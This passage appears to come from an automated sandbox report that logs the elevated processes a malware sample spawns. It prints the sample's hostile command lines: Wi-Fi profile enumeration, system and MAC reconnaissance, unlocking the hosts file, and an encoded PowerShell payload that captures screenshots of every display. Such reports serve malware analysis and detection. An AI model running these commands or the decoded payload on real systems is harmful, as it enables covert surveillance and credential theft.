                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                            Imagebase:0x7ff6b9740000
                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                            Imagebase:0x7ff7a7a80000
                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                            Imagebase:0x7ff734040000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                            Start time:02:41:59
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7a5370000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                            Start time:02:42:00
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                            Start time:02:42:00
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                            Start time:02:42:00
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                            Start time:02:42:00
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                            Imagebase:0x7ff6ec4f0000
                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
                                                                                                                                                                                                                            Imagebase:0x7ff741970000
                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
